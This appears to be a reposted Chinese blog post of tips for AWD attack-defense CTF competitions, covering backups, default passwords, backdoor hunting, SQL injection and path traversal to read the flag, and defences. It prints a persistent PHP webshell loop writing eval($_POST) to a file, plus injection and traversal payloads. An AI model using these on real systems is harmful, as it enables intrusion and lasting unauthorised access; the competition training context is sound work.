0


AWD攻防技巧(水文)

1.数据备份

比赛开始第一时间备份,备份网站目录及数据库,一般在 /var/www/html 目录。

一是为了dump下来,用D盾查杀存在的后门;安装sublime全文搜索关键字

二是为了比赛出现异常或恶意破坏进行还原,避免靶机宕机被扣分;

三要审计下有没有高危命令执行函数,进行后期加固,以及有空余时间或专门安排一个人审计下基础漏洞用来做攻击。

命令执行函数 exec()、passthru()、system()、 shell_exec()、popen() 等;代码执行函数:eval()、assert()、preg_repace()、uasort() 等;文件包含函数 include() 、require() 等,用正则匹配 grep -r "@eval" /www/,找到后注释掉。

1.备份源码,注意隐藏文件使用图像化工具连接ssh后,推荐用winscp,准备centos7.9lamp、ubuntu20.04lamp

tar czvf newfile.tar.gz SOURCE 压缩 zxvf

2.备份数据库, 1)本地还原 2)查看后台账号密码 3)查看关闭数据库远程,推荐adminer.php

mysqldump –u root –p mydatabase > mydatabase_out.sql;

3.恢复备份,在mysql终端下执行:

命令格式:source FILE_PATH

source ~/db.sql

或者在shell下执行

shell> mysqldump -h host -u root -p dbname < dbname_backup.sql

2.弱口令

大多数情况下,所有队伍的Web后台、phpmyadmin等服务的管理密码都一样,立马快速检查修改自己密码,并利用此进行攻击。一般默认密码为 admin/admin, admin/123456, test/test,如果被其他队伍改了那就gg了。

******3.******查找后门

对备份web目录进行后门查杀,脚本获取webshell并快速提交

4.监测攻击payload****

tail -f *.log,看日志,不言而喻,抓他们的payload并利用。

5.常见漏洞

常见的漏洞包括SQL注入、文件包含、文件上传、命令执行等。

(1)sql注入漏洞

比赛一般没有防护(除非选手安装了防御脚本),可直接通过 --sql-shell 执行 select load_file(‘/flag’); 得到flag,也可以利用 into outfile 写木马维持权限。

(2)本地文件包含或目录遍历

直接通过 ../../../../../flag 获取。

6.权限维持

(1)不死马

直接linux执行:

while true;do echo '<?php eval($_POST["x"]);?>' > x.php;sleep 1;done

7.防御方法

  1. waf
  2. 文件监控
  3. 克制不死马、内存马

使用条件竞争的方式,不断循环创建和不死马同名的文件和文件夹

8.批量反弹shell

Reverse Shell Manager

9.批量文件上传

https://github.com/edwardchoijc/ctf-toolkit/tree/master/batch_upload_file

标签: 安全 web安全

本文转载自: https://blog.csdn.net/LHBD_R/article/details/127745424
版权归原作者 玖禁 所有, 如有侵权,请联系我们删除。

“AWD攻防技巧(水文)”的评论:

还没有评论